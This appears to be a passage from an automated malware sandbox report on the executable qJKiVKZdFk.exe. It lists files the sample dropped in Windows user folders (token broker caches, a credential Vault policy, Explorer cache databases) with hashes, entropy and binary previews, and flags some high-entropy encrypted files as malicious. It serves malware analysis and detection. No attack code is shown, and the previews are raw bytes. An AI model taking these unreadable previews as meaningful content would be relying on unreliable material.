                                                                                                                                      MD5:5D35368FF18B5DB8D3474D65CB02DC4D
                                                                                                                                      SHA1:21BAB44DB6489F62A882286A2474EC8F78EA3DE8
                                                                                                                                      SHA-256:E4ACFC6EC3B03442CFB9824597004BB421388AA4D731CD70381FB257346AF74E
                                                                                                                                      SHA-512:B23B32B604957D07F245AF1B8013642A33E078ACE4CF14D7073CB1CA36707CFFF0AC5B0EEA071DF5907C88E50EEEEBD16E6942FED82389495C0E0A37923ED4CC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.".T(c..B.=c"Iu/c#<..R5f,|.g....j.0m..1,..@`o.....L.<........r.~c...C..L.....Y6.T...?..6..x..3I........j...X.D...N..=...H.6..K\^w."..~.[/y..,.4....\.).C..r.X.[..N........{..,.#.....y.Fj.:]=."..E]...*..W..;..-..L.b2n....X..,..-7!.m1Fr.........mYPA....Q.9....}.H[.J.".5.r..V..?..[.w.>6..'.z..G)L...tamm.%.\J.x.#..E..X...D..c(9.....@\.U}.....o...Ds..V.`..Tt...k.D.<..8....0T....;.~..O.\...L.Cg.............m.=....M.R......G...m..#l..u.2v.O.n.[b.J..?...X...R.u..G`.$7....j.l>w4....... ...{+.m".[gU..Y..V..^......#.....'...v3..m...."{.+}o..R..I.K.)O.J.b?.o.]3..)#.[.......k.L....f..P.0.*.......E...(....n.}.3.@P...X.V..H.O..Q?.}*.Z......X..Q.;.o;$?..L.RX....D...y8.<.Nr...}._9....n.X..B.......<6E.k.d.I>.B..az.}.i.."..J.o."..'j...HN........*.!.&g.?........%...BR;U...ko..l'..]<..:.r.... .V....).((eCH..^.......C....'.K..i.Z......)...D.u7+.-O.G.....{..../.{....C}v.....J. ..[.aomL..G.t.j.o..?..6'"P.h\.....#.....e....x.:.<I.'p,...KarD.>?..hd.@

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4956
                                                                                                                                      Entropy (8bit):7.966703814417489
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:ab+ZM/zQoeg6AVleVLocnQzw2gkhLuK3bNk0QUQSE1f+niWzKzo:aCQm5ocnP2gkhLuiimiiK0
                                                                                                                                      MD5:D275413F55178244C1FB916F876F05A7
                                                                                                                                      SHA1:2E27696B4352DE6772C4E90745B17B3598E50524
                                                                                                                                      SHA-256:E3453D74008BEFE31EBDCF8A355BCEE83CA7AD48D8F86B088F97DBB50B8E871A
                                                                                                                                      SHA-512:5BD632463A2DF7227A97D233958A758194DF00C703940E90C011D158EB232630E17DD6FFB8A53D0F13DE2242B8E06200986B0D1F2C18274CC2A3CC197CFAACF5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.".TT("..;pF......_..&.%...S.....1..5AYAkg.......g..+...:....~...0-...!C.\..,/...I.......pk.!.....j....,fX...kg...6.e...|:.......j...n%)I,ce....Hz.g6.......v>.D.......'..^a.n.s..r.PQU. .:.s..rxv...K..O7...{.-...,..]..c..I#../...Q9(4n...C.,.y.D?.tQ(.`+.@...:..v.C#..Ch.....Rp._8`...9......!u..h......&.S.,..d.W.Vg.E.u....04&*...d]x..~q..}.hO.b.y"...t.L.6n.&..Y.$_.b..<.!...E...%R..K..=...s.%)..F...n..Ny.pI..9.q/....[..!.b.r.Y."...W~hL4.OK..|^2.... .....A6...&yK..n7.....:.....B..+.a...>.-/.'...1.....?.....D.de...A....a.....io._...|7.....d}...|.jp|.....)...^T.f..WD..^z..K...!.\>.......Aa...j..Y....... .R.........p.b6..).A....).=...L..0:...~...pI.Bq....o..@4D.....D...a[.....tu......Sf..................S.V.S...q}...x0....5.FA..>T....Yl46.%2x6..[\...k.J.L.......Q}K.!...\._...l...F...j..XgG%.:.p*^p......Q........v..{.6C....vTv..r3.nk......0a.....yQ.a...'........G.......q....8..cz..g......Z.....+0[.bn$.>...v.\.Y...)..2k..o...0..,D.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3018
                                                                                                                                      Entropy (8bit):7.940076964585109
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:xzI5dwv5wT3KuGQlqMbobC+229r5GYE688KOgmvxSpy/vbrpMdD:xzod05YbwM+F2erA362hmpKWvbrpMl
                                                                                                                                      MD5:1B31162DFCC3455DAF2078CECC6541C3
                                                                                                                                      SHA1:0D611EF629C58BBBDD7F775976DB25E0CB044EE6
                                                                                                                                      SHA-256:2790565F70C06C88E957338A870E518FC3D27AAF0C20E55687813AD79FBFF806
                                                                                                                                      SHA-512:C2328EE7A8871AF3B7C5B1D691FBE1427E55071E0CDC981EE031243A95669601105F684BE1F2AC79D407CC20BF95C8D685E9BE34EF02A5FCC71F7322F236EFBD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.".T..u`?q.....E.r.X.......<f...Z.v.....$.1\h..._LK.....H.g.......V4V.8..;...T....@.D. .G....[...~...)...|..T.vM2M.{.o.\iF....Jy..4.Q.. 9U..QN..H.O..wb................CP....n...`...g...6.9..\.c..Y..G ...O..$..A...-Q..4...J.{.&.eJ/.2.#........!..@.3.JIh4"..R.-.w...K...Bu...>......n.d.IzBc2....8'....3..;>..[.S..0.^..M.2d.G....!.G......P.b(..V8t..u.)|.=.w..U.#...8.{.^+..,..6....o6...w.X|.r..........|..J...........Qr.'.{.....f.U.#v5X.H..+#.L..n[>.D..W..K......Q........\..n...Y...t.T.o..9S...1;.x..&(...\.K2...o2.Jt@N.u.w....q,._.]$..]hZ.\.{...\.7=..i.d<=......>..gCm`.ph>b.9.s.....y.8dOd.K....y....&Z.%s.R<.|..v.0P........i;.8..C.8..G..q.h.........&.Z...a..f.c./...c......4..-;.!.f....,..l........I..|}1..*.OI....1k,(;.;..C.+../.1/..f(Nc........g...<.......HxX\.`z6l=.io.p...F.a.2......)."K.CV$\....|K...pA.>.<....n....8.5..P~%_.v}.r..>..Y?b.c...iO....5...ll.c..W.N....Y..W..y.w.J..4F8...4.-Z....a...4$>......,..m....X.y.N3.~..._...;.Z.?@$u.....,N..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\f036564d8b727dbe99499799c7e51936a642f62a.tbres

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2612
                                                                                                                                      Entropy (8bit):7.922186538328433
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Ad6VaAd3zx/mljtK0zFRmPjYOyJewjH8/8KR3McAnO35fBX4e3qG9T81JFID:Ad6R3zx/mhK0z3jJjH8/p2nO3Xt3LGFU
                                                                                                                                      MD5:95C2898A16B9FFB770C2DE6B18EF2A2D
                                                                                                                                      SHA1:2431FB0AD9D7411F23BA3CC4D205173F01CFF209
                                                                                                                                      SHA-256:92E3EE044BDE440AC78C02DBF6B2F90B880A6617B1D3B5E9CC7F1710D83D29AD
                                                                                                                                      SHA-512:00A99DB8303FDF07FB96D2BB8E33D2A05B96C1A8C8D507DFC6B8F99FAF051BC55115C3F106AC2D79BB47768823A9573BB9C12EC78D693EA7389BD1D9492EAEB8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.".TayV...a.Z........QN..e...I.........I....FS........`.....l.<.dRL.o....)'.3.x.."....>o.;.+..,.q<...N...8z/S.SM...*.......G..`..........1(.5......D....i...8<wWe.F....h........C*9].p.O.\.=U......<....A........X..K..........8..M.Q6[.~...[E......j8.-+.g.....UM....:.n6.M....g..<./......G.B....J...>..b.....B., m.B{.B.(....2m..zfi..h.?.dIItb.ds.*H`............`.T.........9.G\.....r....q2B.T>.G..Q.5.{.R\.4Ha..n.."r=..Qi..V..KG...9...D:......3J7.2..;{k....h.e......%T...Z......}.fI...o,..NFSEp5.sk.S...l.?v(..he.*.F....Fn.2...v...-o.~ z.g...w.L!|.2....f-..:55V...@E...p\N.Xu.......V....4....*.\%.".d0.B..5..oK.@.7.;~#nRj..#77.=.%.......+=.&...I.....a.M.....#.3..@|.x..z..RH<.:....MsV.~...YQ'.i...t~A..)w?k.rIh./.y:.G....\N=.G....N..Q...Wi..U.V&a.yV!,.tq.E...2.........U]..noWC.R.|.......l&..M../7.&u ..Q0^lZ..f.......|u......#.q.M..Od'C.:.o.....yJ...d..9..s.[..|.+.Z#X,|Bu....U..~..b....M."&.\.3.d.l.L...I=..y{..z...6Ts..PB7W......._.d.6....B6.B

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):770
                                                                                                                                      Entropy (8bit):7.676327824362269
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:8TCEcWCCUdBtAqOU2lxl9HYCnLjjrqdS0+7bD:8TzcWxGBCqhkz9HYCn6d+/D
                                                                                                                                      MD5:B82BAEC630FAA76C8324F36344432A5A
                                                                                                                                      SHA1:72DB8D92A6234EDE7C8296CA9FDF89DD84DC1FCB
                                                                                                                                      SHA-256:B2DADDB40F5BD5173F4B5DAE0327BC5640B52CF56B5E2791BEFEFCCA3C6DF34C
                                                                                                                                      SHA-512:E51A50BC051896345BAAD3417844B2036366FD78DA0F359F079B8146DCB0C0CE78AEBC1FB604047D5A50724C256C19B6AA943D228163D54731BE013D6F7695C7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:....B)c....Oo.?..pW.....l......:!v.YZ_..x@./.}u.".l[vz./..D...?.@...$.J....t.d...Pl....... c.o.J.6hO.`5.]x....U..h.`N........3.]......B...#i.2`.:..x...w......1..{..".J.<.:.....7..Ue.M..;Pq<@.nY;.....DL._....|..e.@...W...sL..kc...v..R..m..2k...i......T:......z..+..;80.V.O.....:z.]....aN..~.8.3.e......X.I..."..R..2...T.e.`I ....m..*(..f.......A...<..5b.+.i.. .A..B..e..k.HT...u,....=....|....T#....3*.i#~..'..%O....R%.Z<p.V..........A.h.....,.....o...I../.~..%....A.....g..,..(.q......X.Og..A..Y.....[.J'3HO..P.H:...={....$.*.K..O.......!.E.......Od...T........+..],...@<w.Y.PJ.c....jp...c..R.`.m.....3.....$P..*...$.....S.1.\P...87..@o..b.w...Z'..+.....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\2057\StructuredQuerySchema.bin

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):424152
                                                                                                                                      Entropy (8bit):6.332058672226218
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:dAJ83nJEWxJ80n9nm+vyJfbnQkK96B88yKv4bWTmTvEiLSQo:d68nxJh9nm+6dF4/Bo
                                                                                                                                      MD5:E08C89F9A847A57A0FA5EEF3B2678DD3
                                                                                                                                      SHA1:50E1754BA91F99284CC2A591BB0E3F0E0C5F4D16
                                                                                                                                      SHA-256:2EAEE5FBB915435181D790C7BC6851A3D02F0870E46D39F09B5C5B270A34CA2C
                                                                                                                                      SHA-512:E19124D0B9AE6229E86D46A3F880A9DB752F6709BEC01BF2F154C1BCF66973EE4EBA89E6836C4D4B801069F92E7938FBF7D0F5A03B033E8C575896E2C3128F0E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...P.6p&i...A..>o..<7.6.s...2..EZ...6.........E1.x.}..t.$....b.....Z.L.<}...N0..)..a....a..s..*.'.k+..y...h..P........{.nJ_q..Ks..5J..o...c}..*..H8...}.]..1.z.1.(.f....ZX..g{...w9..DVz..,..|E....cE.......G ..W./x.E?C.Km..!..r......*.q...lB..&2T.<..c...sJ..O....l.F,./.?.....3.w.......AN.~.$Nd.S.7h#.Z...P.k.y:.. .A|ew...l.:v..7.e.....~...J[..h'...Ns..X^~.'o.;.....c....*...k.....%<?().....~...@J.B...9.(.....w..X|...YfR....u..........>#.9..........w9...47r.|e....A._!i..n..;.]6.fw.....r..9.4...3.%...\.Z.<.W.....kl.~..6..:{.7=.q......R ...2?..C..4..^..J...w6...........:....1.Q...p| y.u....V....d.O..~'9j..O.G>...`2...\dW.7.-."..KT...t.)pH....;tGp-...i_}..r.d.....Z.$...=..T..n...Y..K.....h..$M......./.;Rf........rE..+.Tt4.u).)\@...`I.\.......ZV.>>:../..s.v..p(.....'./'...j^X..!.ehZj.pnS....KEN. .....N. ...~.#!TJ..?.qm.2.$..7)..;..(f....<...Vz...<.F*.....1....J.7dwx,...F..{..g....e..I..].6D$*!.f....zd=.<............;....]"..$}.;.....lg%RbF.d.^;........

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16718
                                                                                                                                      Entropy (8bit):7.988749404241901
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:iNsvI9TyJ6/UPoU9UugXEXOtexJrxlr0ykA4cIWSwMdPn4nRInxxLrsCmp+:iqvMOocHY0+M9oykAvfe4OrsW
                                                                                                                                      MD5:4B6401C4801CF6F105F323FDBC4A4F6F
                                                                                                                                      SHA1:49BC4524EA1949723CCEC7E438A152DF55BD2FE3
                                                                                                                                      SHA-256:AAAAC9643AB6CEE93CF498712BE14B22C91B73A32E1B3BFA9F453CC49D829AC8
                                                                                                                                      SHA-512:7C3866510935DE66AD0B188E78D540D0BF99B21B4212C0BC69FE275980286AC89346A1F2C0CEF8D6E54DBCE7CAE1871E7DD6DE7D94C70828ACECCEF4819C35CB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.... ...(..f.H......HB.....E....q(...;r.......4.6.zGD...Y.=....Zj.....y4..2.....E...F.y.....i....7..&.*....4.......A|IQB........n.U\F..`m4.zFnmC.!..UIF?.Z.I).[m.mU..<.U-X.3e5>m.....V=a...@#TI........f..D.8..._f...Tf.?...i.k.....&.:t....xX...(...]f.A.....a(..%u.?..y....../o....e.....8.[k...QV..6..d.T.y*....u..m_P.,E..\...p..zS...{...E..k..+..........{V1...~.1o|%.J&.>..........D.J#g..w3A|...5....-60..Y.5T.-.ol~KV......+p[\R...Te.....2.........K...y.....W........'#..<...'.....k.u.E.|.f..2W. .m..h\]....a..L.W~...u....p..HN...8.&.[^;%...!.%s..K..,.....*../..q| .7.!....)..rf=.p.......q.^.~.c.=..Z;x|..7..%%"4Lk.(.Fk......o..hE59.Ye+.5H.^....h..y....O.$..X.l...Fv...aMbb..Zu.H......F..F...U.#[.............^..y....D.....K...c..?.%4...n.....+.oxeA..m.....|..2.p....DY.>h{"L)A0. ..H=..SS.p..&.7Y.8c[p..f.........`V.].D..e.V..V..p.x..."I^T1..;E.CYj...;:..;..u....ai\..T1$.^`y~....\T|..g1.....m.~.....-..a..B..V.f3LG.F.`5....f...73.*....k.`\..... .{.H...;V

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.3.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16718
                                                                                                                                      Entropy (8bit):7.986054237828975
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:9jZszeQdiYxo7mF7bmCJVnwuN8sAc+g+Zs0pzuGKp:BZbQ8MFX/JVnwlcX++0+
                                                                                                                                      MD5:28110FE47526A02AB62A66E39FBE516B
                                                                                                                                      SHA1:54158A5E7706CAA634322B697FBA77BDBD79EA87
                                                                                                                                      SHA-256:15C17B74D6F2E624A0B4FD4ACD3E99BF3622DC825EB7006274383A402BDC6C47
                                                                                                                                      SHA-512:90F36E9AA7C87C7E4A9D27BAAF6AA2DABFADD352EF9951EC5E009A144AB2261729E068D8CEC473DA677086204CF0904365FA1ABE76C1A50571FE19B5B6481B77
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:....`UJg.n.k..rMq.Q.m.....W..\...v....0...8Bsr...R.FK....O1..B.....0l...{.y.O.tXA.Hu:k.|5W'.65..uFiv.1..+LcB.pg....lD?h ..{8.5.;..S0N.M..g..\.q.......1`.OI...m.............(!.S........}O.....]B......G..q..T....ml....U.7i.~.........i.KY..n........4,A....t.*.T..O. .....jLE...\m.M....0Ss.."....Ww..w..>.>...{3`.@+Z.Z.'.|.Vc$ ..<.3.j...ae...`+}.9.....-jVq..3x.{c4V.XU..).z.?<..L..B._.e.IvHI..h.0.v..q4........`..e..l..8..3..(..DHuh....J,...'5\[.}.[..San9....e S...........7@.N\....p.mnUb..C..FT.k..xfz.8/.u.L........w.....pn...X0y.8t...s...._.u.$j.9VX.....'9/7cZ.@.;6.....Y.G....4..Y.S.=1.@d....BgR!.......P.j.....~2`.QG....W<}.. iJ...j.. X.z0...;......o..&.H...K .r..f...b.7).6e/..u.yj...!T.>....K..u7..u@b ..^..SF...|..H....l.W.j...]..*k"OK..<i.....<gB.C....D.H..\W..ps[.3{3..s.Ih..tu.K...o-..r.@....U6'..3..L.M.C4..GY(..[|..}..7.....F-..[.g?...c..i.)@..&V..B....="...5wo....6..4..XL..&.u..r~GW^Dz..O8.M9.d .2.....<\.......a.5..m.....Y|e...RS..J.fp.2.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{0325ABFA-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):424190
                                                                                                                                      Entropy (8bit):6.332015976653587
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:DY4+B2tuC1pqx4Q2rJDm+vyJfbnQkK96B88yKv4bWTmTvEiLSC:DYJ2tVpvQEm+6dF4/R
                                                                                                                                      MD5:D71A1C8025B90876E60D6A8388D9D7EF
                                                                                                                                      SHA1:5FFE1FDDB4AC78E97D6135BA2DD9CB178FC64B2B
                                                                                                                                      SHA-256:1766B4B661016056EF72A1DD7EA9A09C6DE92EAAE5B3903FB4EB57ADE8AB82E4
                                                                                                                                      SHA-512:63629A908DB5DF8F03C11FFD881C4A6B7C267FDB61343B693FDA51353C287CA5EFD2BF68FA5E0D0FB76193908C0EDAB64F4DE1128A0DDA8A855001FE75546ED9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.w.. ^.3I..!.FO......<...wr......W.T>e..;.tS.........QE..p....2}.].^3$.u..6.&....:..o...~.l.tKn...z.B.).(W.....i&tTI..$...i..G.a&.5.R14..{.[.MJ...{%X....@ .+..^jbT...8A2....JboX..r'......WQ...{....._2.[..{..hv....k..-.+....w...<..... $..>....g...%..a+......:.W.}.'......zZ..........h...lq.q8..Q.R......l.....;|.4.)...?..?.m..._....#.._a._.......%R _...7p.8N@......... ..B.1.NE..H..6.:g6..2..........vAJ..)~[$..A,..z..a..?..F/aB.|.~}G.>.....6~.~^.2.<A.`<+.8.5.x.51M..ls.#....m.q.\O:.^...~]..7R.!..$...Ye)<.:.&.....$..j.$Z....E;...hU.b...d..2.=.Rc\.7m2....'...s.fo.......[X.Q;....W...^.....Z.C......u).......MN.......,.E...A%..F .g.".,_.k....:A.X..f........p.Z..K...ST*.%?.....*...RC:.aE)..U..O.....e<S..L....o.....hUQ..'A.sE.\L^.a...v..2.YHK.W.`...2z_....F\H...p....g.\...A.s../e.&2.^...w.N_.>.I..E.W.5(.gjK.n..e.N....W.[...M.,...g..".7.c.O.=.O.#.X.1iv.....Y.;n........4u......M.OM.~;y...4..J-^.p.w.........@........N<......,..:p.'-X.".$.I.=.../YO4....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001b.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):102918
                                                                                                                                      Entropy (8bit):7.998237354281132
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:3072:9ZC9p/FHYfjPth6/eoByeb03XYq8KLleT9IBp+0:94vxYfjPD6zBK8KLcILx
                                                                                                                                      MD5:F5C16642A55CB34F27C6748FCD8B80C9
                                                                                                                                      SHA1:2ABE260AECEE0A68BC553B214457F46C66CC51C0
                                                                                                                                      SHA-256:7FC51AEC6F033656AAA602E8116F173AA4E5B44C63837932A2B8E6215E23AAAE
                                                                                                                                      SHA-512:C68B96FB62A6EF0CBF50A6D535161D41E9B4E4B3B67978005E4D61D8A68201B8945DED1B195F1A839C7D3B6BC1BCB112D0A86D1A95A8566FEF9494A2E5E5895E
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:....h6...o....._..n......zzb.j;...)....W...t.h....@...& .......O..oH.,.H....r.5.e`z)8.G.......p...yR..H.kRi+....!.T.(6G..,R..$@.o.....x.N..>.vd...../...K..._/O.R.6J.........l.{>'.I.C.}.t..Ki.,.)j.....2...../._.*D..N...K\5...8eR.@..3......5d0..T...........C....[.>L..^....6..^i.|>..-}.zi`INU....9)...1 ...I...\.^......../T.%T......'N.8>..O.%P.A.#.2..-..2;w.-..!I.V..2.[......K...8..W.~ .;.......2.Nx.{.@d..qhk(:F.....{W......5FE.._..w^......y...,...<.#[..3.a.b...+d.e../..J.5..'|....3.............j(v...=y.ym..C%.P.$W.w..,.......<....I6....q91.U&.....u.m..5F..T.I.`..9"1XmK..;...D...c9@.)...<.9.t.9f......!...."..:5.8.`...ir....K._..i...>..E|FK;..M0....k./..q$..o........~.k.Q.Q....N....&..@.8$..?..35...&....B.@.B(~.b.O.i.J.@..34...|...I~.D...h]h...?8....~...!CK_.}s.H.?]..F~P5..w*&z.0cBBY.]..fL..K..Gl....#\.|LloX........v...(.._4.a$...;...S."....K..K.........nf.*.U/.%.....7...z....&ZW.. .C.~.........hy.'......X.....%..70t2......5h.L...W.2

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):75502
                                                                                                                                      Entropy (8bit):7.9978803277010195
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:dxTin39IfkyJwMl55+4uWrS5+BveUHD4SVWolEYsQtMONl8RJ:dENJZMlDqWa+B2mVWeELQt/lU
                                                                                                                                      MD5:140FFD8BBA5A195867F9BBC1EDFDB5C3
                                                                                                                                      SHA1:391E0F0F5979D6FC454D8428DA654AC822406975
                                                                                                                                      SHA-256:FC5C649F376CC575EF2903C09562E7E348DA0A8C32DE94D4501B37B1236E3D6C
                                                                                                                                      SHA-512:72DF95E0F2353BDCBB714EC63201E14E32056E484642C30A43E7EA67276E00A728515FA2D34F563B1D10812F9C50AD97CA85388568DB6B88AF0E5488AAE602A2
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:.....J.<.\...............5,".q......=...F4.H...6r..R...h.`&.CK....9.......~.8.G..yV..)....M....n.++E..".2d...$...p.C>.f....>x4.RM....?....B..i..@.B#.3...j. h.......+_^.........%.+.n..#.PK3~..;D..........y.,.B.....$..(g....?h....2im......0..<8..ey{...x.....d-[K.h....../..Z..2.ZT....%...........7v.9u.z.s..Z.X..<C.`[2.H.qy..F..#..=!!hK....f.1kFyi..NZ...........S...9...n..X}v$.5' A..aS.:\b.|.4!.....TU....[.Hd....Xw.H.(9~.......A....M....W.anL.P.].w!....q].QcC.T..D...*......'=Y.X....}F-.Q..a.1 ..lpn.w........8..%#.......z.Y..H.........`.N`...!..Z......`.k..=....PgV-........e...,....Xew......Q...".n\u.f.W....".^.2;I.e.#.4..t.$!.Z.P.8.....$.-_.1m.W....V......I...........b;d..z.5D.K.:.g.6.......2ur.....?.s......[nu.....l)..'{aEO8.Q).....S+x..*...K.T.H9&.. ...z.\Q..i.F.p....A........|..)..._%...s...H.+.T.@!p3.v....#....a...{,.....A5..j6.....W.vDk......x..Z....DAH...U3...........(......*5 .[.|r....].(.(.U0./...3.5...f.wV...h..k..[d

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):105422
                                                                                                                                      Entropy (8bit):7.9981987413215725
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:3072:mXceLTHfH4ZcMU0wKlkjOHLdLt0H4RglDfWfwzXFSKFC:c3THv4Z3zwKWOHptsE+f0wxLFC
                                                                                                                                      MD5:831CFCFE72CF517617773A8C8504A0C5
                                                                                                                                      SHA1:006B1EA5156D7BF80FE5FAC34E69D9B56BB0C613
                                                                                                                                      SHA-256:37044475CD201F7733F4D7FE5DA815786592FCD36B4C2060FF1DAED3FFF72044
                                                                                                                                      SHA-512:AAFE7EC31E233D03159852E5D6B0104AD87C862D6DEE385C4C69DA9CDA73CA27AE411A75A9881BADD363B217F18D22CCC595459B5FDCC41B4C1E6B211D87D0BB
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:.... ....8....flB...@.;.p..&.Y..oEJ.*.<.|Pv..A....::..hc9......A.;N.]..W..^.Nk..1;.:i6...$@Mp#.7...k.?..."d#...t..KoQ..^=.....AH......=Tr,.m.....6%...1<.um..*.....pi..Z....N....d..%.a.A.%....Bn..sr.v...`.q..=........qt.a.}p...7[.w..N..0.w.vB..t....ez#.....C.j.,Z....w..l........aH....J...i......7k...A...I.Aj...^...X1.ea.7..._.u...h4X...u.o.....U....^.S...}vuI...;..[...s..~L....@Ux..7r..b.L2+...E./Z..>.S.....}NZ..nU}....!..E"..A......-`...P.z..Y....m$9..6~8+..W/q.@.PWG.....W.^...)/.O$.g.V.)..w.P.i...pT.............g.].p....o...h!.~.....p.RJ.6..a.0.Q...,.....b..*.J....fF.1.+~..\T!.........(_.."!.......s.x.S_....d...P.k...&....k.7.z+.4=..9Co.C..HQ...p"..6)....7...wh...5..22.=..f.....K....CN.To.Q}l.~Q..J.B..p."v.-.....!d. .O.^......6p..."...F_.m....\e....!r....(...Z...Wa..Q.ps.n.![.........%D.Nr...+...g{..N..."...&<S.#.&0`.5.YW...@.9b..R...W.."...$a...ero;.K.*.z;.`?-.^8.u...<.P..K.2...U]v1.N.|R.\.C....$.x.$1.,.1......5@=..r,pa...j.i.....aQU..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog.etl

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):639310
                                                                                                                                      Entropy (8bit):5.732545571902894
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:74660zWAHjx0AxcNdbanlWIYH8PxH6sZW/h3E+NM:H6MWA2A2MEIRHcJ3EgM
                                                                                                                                      MD5:950588F52CABE6730847A424A6EEADAA
                                                                                                                                      SHA1:14B977AB2398AB4ECACEA789DA4C4E0CD114C35B
                                                                                                                                      SHA-256:5B8727ECBC300465C15A55CB7F278D4E48F6B9A42EB99C7D0CA7CADD5FDDD99E
                                                                                                                                      SHA-512:B9ABAC676DEA6DC6F69A52A86EE8D4F69BA450958C124EC7E8F2B4306EC5323A7A73747238E3A25482BDB52763232631C3D67BF52B94BFDA23FFDC9A92B12D8D
                                                                                                                                      Malicious:false
